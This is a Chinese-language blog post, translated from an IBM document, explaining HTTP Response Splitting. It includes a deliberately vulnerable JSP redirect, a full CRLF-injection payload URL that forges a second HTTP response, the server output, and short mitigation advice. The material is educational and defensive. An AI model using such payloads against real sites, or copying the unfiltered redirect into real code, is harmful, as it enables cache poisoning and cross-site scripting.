HTTP Response Splitting 攻击

最新推荐文章于 2024-05-22 08:51:19 发布
最新推荐文章于 2024-05-22 08:51:19 发布
阅读量5.5k 收藏 4
点赞数
分类专栏: 安全 文章标签: 服务器 weblogic web服务 server web module

翻译自https://www-304.ibm.com/support/docview.wss?uid=swg27019020#Conclusions

摘要:

    国外将其归结为一种新的WEB应用漏洞攻击技术,可以构造跨站、缓存投毒和劫持敏感用户信息等。攻击是由于服务器没有过滤提交的回车(CR,ASCII 13 0x0D,\r)和换行(LF,ASCII 10 0x0A,\n),根据HTTP标准(RFC2616),headers由CRLF进行分割,因此没有删除CR和LF将会导致攻击者随意构造headers,控制body,或者将响应分割为两个或更多的响应。
    国内有人认为不应该将“HTTP Response Splitting”归结是一种新WEB应用漏洞的攻击手法,而是把它归类为一个古老的系统漏洞。这种看法基于漏洞的产生原理而并非漏洞的攻击方式。"\r\n"在HTTP的RFC中被规定为分隔符,也就是说WEB服务器没有过滤用户的输入,允许用户直接输入协议中规定的特殊含义的字段。很显然,错误在WEB服务器本身,而与写上层应用系统的语言无关,更与应用系统无关。PHP就针对此类漏洞从4.4.2和5.1.2版本开始提供防护。

原理介绍:

        造成http响应头截断漏洞的主要原因是对用户提交的非法字符没有进行严格的过滤,尤其是CR,LF字符的输入。攻击者通过发送经过精心构造的request请求,迫使服务器认为其返回的数据是两个响应,而不是常规的一个响应。在正常情况下,第一个响应可能被攻击者部分控制,但是这并不是主要的。最重要的是攻击者从HTTP状态行到响应体(response body)的最后一个字节完全控制第二个响应。当可以通过精心构造的request完全控制第二个响应时,可以通过这样来实现攻击:发送两个请求A,B。A请求包含构造数据,该请求致使服务器返回两个响应R1,R2,其中R2是可以通过在A中的精心构造而完全控制的。服务器将R1作为response返回给A,而R2则被服务器作为B的response而返回给了B﹙即使R2并不是服务器自己生成的)。

                                 Request A------------->Web Server(R1,R2)
                                 Request B------------->Web Server (本该是R3)
                                 Web Server(R1)------------>A
                                 Web Server(R2)------------>B
基本技术:

        http响应头截断攻击重点在于可以在http头中输入数据,构造特殊字符形成截断。最可能的是在Location字段,还有在Set-Cookie字段中。

考虑如下的JSP页面 (assume it is located in /redir_lang.jsp):

<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>


当传递参数lang=English,它会重新定向到/by_lang.jsp?lang=English,典型相应如下


HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 12:53:28 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=English
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT
2003 271009 with
Content-Type: text/html
Set-Cookie:
JSESSIONID=1pMRZOiOQzZiE6Y6iivsREg82pq9Bo1ape7h4YoHZ62RXjApqwB
E!-1251019693; path=/
Connection: Close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It is now at <a
href="http://10.1.1.1/by_lang.jsp?lang=English">http://10.1.1.
1/by_lang.jsp?lang=English</a>.</p>
</body></html>

    正如我们所看到的,参数被嵌入到了响应头的Location位置,我们就可以构造特殊的字符(CRLF)来截断http头,并附件一个自己构造的头:

/redir_lang.jsp?lang=foobar%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html>Shazam</html>

 

服务器返回参数如下:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>


Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT
2003 271009 with
Content-Type: text/html
Set-Cookie:
JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us
S!-1251019693; path=/
Connection: Close
<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It is now at <ahref="http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19<html>Shazam</html>">http://10.1.1.1/by_lang.jsp?l ang=foobar
Content-Length: 0


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
&lt;html&gt;Shazam&lt;/html&gt;</a>.</p>
</body></html>

解释:

TCP数据流解析如下:

1.第一个响应,是302 response(redirection)跳转响应,红色字体部分;

2.第二个响应,是包含19个字节内容的200 response(OK)响应,参见下划线表示的部分;

3.其余的数据,在第二响应结束前得多余数据,不符合HTTP标准。

所以可以发送两个请求:

1.   /redir_lang.jsp?lang=foobar%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html>Shazam</html>

2.   /index.html

这样服务器对于第一个请求返回:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMTLocation: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0
对于第二个请求返回:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>

防范方法:

通常情况下,这种攻击方式多发生在:

1. Set-Cookie 中的内容用户可以控制

2. 302跳转的 Location 地址用户可以控制

3. 其他自定义Header 用户可以控制

在这3个地方过滤或者替换 %0d%0a

cqf539
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTTP Response Splitting原理和解决方案
起止洺的博客
11-27 1万+
描述: 造成http响应头截断漏洞的主要原因是对用户提交的非法字符没有进行严格的过滤,尤 其是CR,LF字符的输入。攻击者通过发送一经过精心构造的request,迫使服务器认为其返回的数据是两个响应,而不是常规的一个响应。当可以通过精心制作的request完全 控制第二个响应时,可以通过这样来实现攻击:发送两个请求A,B。A请求包含构造数据,该请求致使服务器返回两个响应R1,R2,其中R2是可以...
HTTP Response Splitting攻击探究
10-27 3989
学习WebGoat第一章General第一小节:HTTP Basics:使用Proxy软件(例如Webscarab)来截断浏览器(客户端)和Server之间的HTTP通信,之后任意篡改得到预期结果即可。第二小节:HTTP Splitting:(其实应该为HTTP Response Splitting)分为两步——1、HTTP Splitting;2、Cache PoisoningHTTP Response Splitting介绍:“HTTP Response Splitting” is a new appl
关于 HTTP Response Splitting 攻击
收集盒 Book box
08-05 1075
鬼仔 blog     http://huaidan.org/archives/2619.html 左左右右   http://blog.csdn.net/fallinsky/article/details/5969348
使用Jsoup解析HTML字符串
qq_2662385590的博客
12-21 648
有时候调取接口的,返回一个HTML页面,我们后台拿到HTML页面字符串,需要解析发给前台使用,比如一个地址,或者HTML字符串里面的相关内容。 获取jsoup的jar包,可以去maven仓库中下载,下载地址: jsoup仓库下载地址 解析案例如下: @Test public void test5() { String html = "<html><head><title>302 Moved Temporarily</title>&
如何防止HTTP响应截断攻击
最新发布
gmqqcsdn的博客
05-22 978
HTTP响应截断攻击HTTP Response Splitting)是一种常见的网络攻击方式,攻击者通过在请求中注入恶意的CRLF(Carriage Return Line Feed,即换行符)来拆分HTTP响应。这种攻击使得服务器返回两个或更多的响应,攻击者可以控制其中一个或多个响应,从而实现多种恶意行为,如跨站脚本攻击(XSS)、会话固定、缓存病毒攻击等。参数化查询是一种在SQL查询中使用占位符(如问号、冒号等)表示输入参数的方法,然后将实际的参数值与占位符相绑定。
安全测试之一:HTTP响应头拆分/CRLF注入详解
楠人的博客-随风而过
06-11 3705
一:前言 “HTTP响应头拆分漏洞”是一种新型的web攻击方案,它重新产生了很多安全漏洞包括:web缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞。这项攻击方案,包括其衍生的一系列技术产生,是由于web应用程序没有对用户的提交进行严格过滤,导致非法用户可以提交一些恶意字符,更具体来说,是对用户输入的CR 和LF字符没有进行严格的过滤。 “HTTP响应头拆分漏洞”及其相关的攻击
深入浅出http拆分攻击
琦少的专栏
06-13 1880
以前习惯了些微博,和本地的读书笔记。这是入驻csdn博客后的第一篇文章。 旨在于听取大家对问题的讨论,所谓集众的智慧。 再有分享一下自己的学习和研究心得,帮助存在同样需求的朋友。 下面言归正传,今天讨论的问题主要是http协议的,响应头拆分攻击。 众所周知,http协议通常情况是一个请求,对应着一个应答。 当然就像是一加一在算错的情况下还可以等于2。http请求在被攻击的时候也能由客户端
HttpURLConnection getContentLength();返回时-1或者是0
weixin_30872337的博客
02-20 495
出现问题:当getContentLength();返回时-1或者是0时候。 解决办法:需加上conn.setRequestProperty("Accept-Encoding", "identity"); 解释:在默认情况下,HttpURLConnection 使用 gzip方式获取,文件getContentLength()这个方法,每次read完成后可以获得,当前已经传送了多少数据,而不能用...
PHP漏洞全解
02-12
9、HTTP 响应拆分攻击(HTTP Response Splitting) 10、文件上传漏洞(File Upload Attack) 11、目录穿越漏洞(Directory Traversal) 12、远程文件包含攻击(Remote Inclusion) 13、动态函数注入攻击(Dynamic Variable ...
php漏洞大全
03-09
 9.HTTP响应拆分攻击(HTTP Response Splitting)  10.文件上传漏洞(File Upload Attack)  11.目录穿越漏洞(Directory Traversal)  12.远程文件包含攻击(Remote Inclusion)  13.动态函数注入攻击(Dynamic ...
经典的PHP网站安全防御文章
09-14
9、HTTP响应拆分攻击(HTTP Response Splitting) 10、文件上传漏洞(File Upload Attack) 11、目录穿越漏洞(Directory Traversal) 12、远程文件包含攻击(Remote Inclusion) 13、动态函数注入攻击(Dynamic Variable...
PHP漏洞全解1
08-03
HTTP响应拆分攻击HTTP Response Splitting)利用HTTP头中的新行字符,注入额外的响应内容。通过确保所有用户输入都经过过滤和转义,可以避免这种攻击。 文件上传漏洞(File Upload Attack)允许攻击者上传恶意...
php漏洞全解1
08-03
8. **HTTP响应拆分攻击(HTTP Response Splitting)**:攻击者通过在HTTP响应头中注入换行符,篡改响应内容。应避免在用户输入中直接构建HTTP响应头,确保所有输入都被适当转义。 9. **文件上传漏洞(File Upload ...
OWASP靶机解题笔记_WebGoat_General篇
xxx_Python的博客
05-22 4061
OWASP靶机解题笔记_WebGoat_General篇一、如何访问General二、General内容介绍及解题1、Http Basics2、HTTP Splitting解题方法3、 Cache Poisoning解题方法 一、如何访问General 通过浏览器访问http://IP,然后在web页面点击进入OWASP WebGoat 点击后需输入OWASP靶机账号密码授权root/owaspbwa 点击Start WebGoat 开始你的学习之旅吧! 二、General内容介绍及解题 本次学习过程
HTTP协议详解
FreeNote
08-31 1618
一、什么是HTTP协议: HTTP(HyperText Transfer Protocol),即超文本传输协议。主要用于互联网之间的网络传输,在网络模型中属于应用层的。所有的浏览器到WWW文件都必须遵守这个标准。   二、HTTP协议解析: HTTP协议主要是服务器和客户端之间通信的,他们通信主要有两种协议:即请求协议和响应协议 1、请求协议: 请求协议主要是由浏览器发送给客户端的,而...
老树开新花,再看 HTTP Response Splitting 攻击
暴风一簇的专栏 (roseone)
05-20 661
 为了讲清楚这个问题,首先我们来看一个校内网的XSS。漏洞出在 http://login.xiaonei.com正常情况下,用户名处是已经htmlencode过了的(实际上 a这里是 htmlencode过的)接下来随便在什么站上构造如下form:%0d%0a%0d%0aalert(/XSS/);" method="post">                        提交该表单
HTTP 响应拆分攻击是什么?底层原理是什么?
长风破浪会有时的博客
05-06 577
攻击者在HTTP响应中插入特殊字符,使Web应用程序解释成两个响应,导致响应头信息被恶意篡改,进而导致攻击者可以控制Web页面内容、执行跨站脚本攻击等。HTTP响应拆分攻击的底层原理是攻击者构造恶意的HTTP请求,其中包含特殊字符(例如换行符、回车符等),然后将该请求发送到Web应用程序。编码输出数据:Web应用程序可以对输出数据进行编码,例如使用URL编码、HTML编码等,防止攻击者通过HTTP响应拆分攻击注入恶意的HTML代码和脚本。
http response splitting attack 的基本原理
packet的专栏
06-05 5314
    translation:                      <->原理简介  http响应头截断是一种新的攻击技术,由该技术衍生了许多攻击的方法:web cache poisoning,cross user defacement,cross –site scripting等。攻击者利用它 可以获取用户的敏感信息甚至是包含用户名和密码的认证信息。在许多环境下都存在该攻击的可能,Mic
PHP网站安全:常见攻击与防范
9. **HTTP响应拆分攻击(HTTP Response Splitting)**: 攻击者通过在响应头中插入换行符,操纵响应内容,可能导致跨站脚本或缓存中毒。 10. **文件上传漏洞(File Upload Attack)**: 不安全的文件上传功能可能允许攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值